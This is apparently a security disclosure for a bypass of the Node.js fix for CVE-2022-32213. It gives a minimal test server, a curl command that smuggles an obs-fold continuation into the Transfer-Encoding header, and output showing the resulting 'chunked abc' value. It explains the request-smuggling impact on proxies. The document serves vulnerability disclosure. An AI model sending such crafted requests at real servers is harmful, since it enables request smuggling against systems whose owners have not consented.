Node.js: CVE-2022-32213 bypass via obs-fold mechanic

Summary

The fix for CVE-2022-32213 can be bypass using an obs-fold, which Node’s http parser supports

Proof-Of-Concept

const http = require('http');

http.createServer((request, response) => {
  let body = [];
  request.on('error', (err) => {
    response.end("error while reading body: " + err)
}).on('data', (chunk) => {
    body.push(chunk);
}).on('end', () => {
    body = Buffer.concat(body).toString();

    response.on('error', (err) => {
        response.end("error while sending response: " + err)
    });

    response.end("Headers: " + JSON.stringify(request.headers));
  });
}).listen(5000);

Send the obs-fold via curl

curl -vv -H $'Transfer-Encoding: chunked\r\n abc' --data "A" http://127.0.0.1:5000

See that the server accepted the chunked request, and will incorrectly fold abc to the value of the Transfer-Encoding header. This is seen in the value of “transfer-encoding” as “chunked abc” in the printed headers.

Headers: {"host":"127.0.0.1:5000","user-agent":"curl/7.83.1","accept":"*/*","transfer-encoding":"chunked abc","content-type":"application/x-www-form-urlencoded"}

Impact

If nodejs HTTP module is used as a proxy, then it incorrectly parses the transfer-encoding header as indicative of chunked request, while folding the headers and hence forwarding Transfer-Encoding: chunked abc which is not a valid transfer-encoding header to the downstream server. As such this can lead to the HTTP request smuggling as indicated by CVE-2022-32213.